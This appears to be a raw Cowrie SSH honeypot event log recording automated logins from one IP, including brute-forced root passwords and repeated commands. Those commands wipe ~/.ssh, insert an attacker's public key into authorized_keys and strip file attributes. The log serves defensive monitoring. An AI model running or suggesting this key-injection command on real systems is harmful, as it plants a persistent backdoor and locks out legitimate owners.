{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:42.228608Z","src_ip":"212.227.235.229","session":"d709afc2e0a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:29:42.463622Z","src_ip":"212.227.235.229","session":"d709afc2e0a0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:29:42.464334Z","src_ip":"212.227.235.229","session":"d709afc2e0a0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:29:42.553758Z","src_ip":"212.227.235.229","session":"d709afc2e0a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:42.554646Z","src_ip":"212.227.235.229","session":"d709afc2e0a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32785,"dst_ip":"1.2.3.4","dst_port":22,"session":"9637ddb19a44","protocol":"ssh","message":"New connection: 212.227.235.229:32785 (1.2.3.4:22) [session: 9637ddb19a44]","sensor":"my-vps","timestamp":"2025-09-09T06:29:42.597244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:29:42.598072Z","src_ip":"212.227.235.229","session":"9637ddb19a44"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:29:42.663476Z","src_ip":"212.227.235.229","session":"9637ddb19a44"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:29:42.968458Z","src_ip":"212.227.235.229","session":"9637ddb19a44"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:43.087300Z","src_ip":"212.227.235.229","session":"94db4a1fbc82"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:29:43.531293Z","src_ip":"212.227.235.229","session":"94db4a1fbc82"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:29:43.532036Z","src_ip":"212.227.235.229","session":"94db4a1fbc82"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:29:43.951080Z","src_ip":"212.227.235.229","session":"94db4a1fbc82"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:43.952103Z","src_ip":"212.227.235.229","session":"94db4a1fbc82"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:44.036314Z","src_ip":"212.227.235.229","session":"9637ddb19a44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32971,"dst_ip":"1.2.3.4","dst_port":22,"session":"caa6afbb6cc8","protocol":"ssh","message":"New connection: 212.227.235.229:32971 (1.2.3.4:22) [session: caa6afbb6cc8]","sensor":"my-vps","timestamp":"2025-09-09T06:29:44.103999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:29:44.104858Z","src_ip":"212.227.235.229","session":"caa6afbb6cc8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:29:44.171762Z","src_ip":"212.227.235.229","session":"caa6afbb6cc8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36799,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b4e8db39fe8","protocol":"ssh","message":"New connection: 212.227.235.229:36799 (1.2.3.4:22) [session: 5b4e8db39fe8]","sensor":"my-vps","timestamp":"2025-09-09T06:29:44.346100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:29:44.352842Z","src_ip":"212.227.235.229","session":"5b4e8db39fe8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:29:44.479721Z","src_ip":"212.227.235.229","session":"caa6afbb6cc8"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:44.547726Z","src_ip":"212.227.235.229","session":"caa6afbb6cc8"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:44.567688Z","src_ip":"212.227.235.229","session":"d709afc2e0a0"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:29:44.771219Z","src_ip":"212.227.235.229","session":"5b4e8db39fe8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:29:46.432626Z","src_ip":"212.227.235.229","session":"5b4e8db39fe8"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:47.841173Z","src_ip":"212.227.235.229","session":"5b4e8db39fe8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37672,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0196c83e924","protocol":"ssh","message":"New connection: 212.227.235.229:37672 (1.2.3.4:22) [session: d0196c83e924]","sensor":"my-vps","timestamp":"2025-09-09T06:29:48.290507Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:29:48.291454Z","src_ip":"212.227.235.229","session":"d0196c83e924"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:29:48.715273Z","src_ip":"212.227.235.229","session":"d0196c83e924"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:29:50.424222Z","src_ip":"212.227.235.229","session":"d0196c83e924"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:50.872480Z","src_ip":"212.227.235.229","session":"d0196c83e924"}
{"eventid":"cowrie.session.closed","duration":"11.5","message":"Connection lost after 11.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:50.878814Z","src_ip":"212.227.235.229","session":"94db4a1fbc82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39738,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f4d4a706c4d","protocol":"ssh","message":"New connection: 212.227.235.229:39738 (1.2.3.4:22) [session: 6f4d4a706c4d]","sensor":"my-vps","timestamp":"2025-09-09T06:30:04.464001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:30:04.465080Z","src_ip":"212.227.235.229","session":"6f4d4a706c4d"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:30:04.832232Z","src_ip":"212.227.235.229","session":"6f4d4a706c4d"}
{"eventid":"cowrie.login.success","username":"root","password":"qazwsx!@#","message":"login attempt [root/qazwsx!@#] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:30:06.445310Z","src_ip":"212.227.235.229","session":"6f4d4a706c4d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:30:07.355829Z","src_ip":"212.227.235.229","session":"6f4d4a706c4d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:30:07.356604Z","src_ip":"212.227.235.229","session":"6f4d4a706c4d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:30:07.357645Z","src_ip":"212.227.235.229","session":"6f4d4a706c4d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:08.898975Z","src_ip":"212.227.235.229","session":"6f4d4a706c4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49927,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3e4cee84c7a","protocol":"ssh","message":"New connection: 212.227.235.229:49927 (1.2.3.4:22) [session: c3e4cee84c7a]","sensor":"my-vps","timestamp":"2025-09-09T06:30:08.966346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:30:08.967037Z","src_ip":"212.227.235.229","session":"c3e4cee84c7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:30:09.079143Z","src_ip":"212.227.235.229","session":"c3e4cee84c7a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:30:09.379016Z","src_ip":"212.227.235.229","session":"6f4d4a706c4d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:30:09.379726Z","src_ip":"212.227.235.229","session":"6f4d4a706c4d"}
{"eventid":"cowrie.login.success","username":"root","password":"asd123asd","message":"login attempt [root/asd123asd] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:30:09.601565Z","src_ip":"212.227.235.229","session":"c3e4cee84c7a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:30:09.751002Z","src_ip":"212.227.235.229","session":"6f4d4a706c4d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:09.751826Z","src_ip":"212.227.235.229","session":"6f4d4a706c4d"}
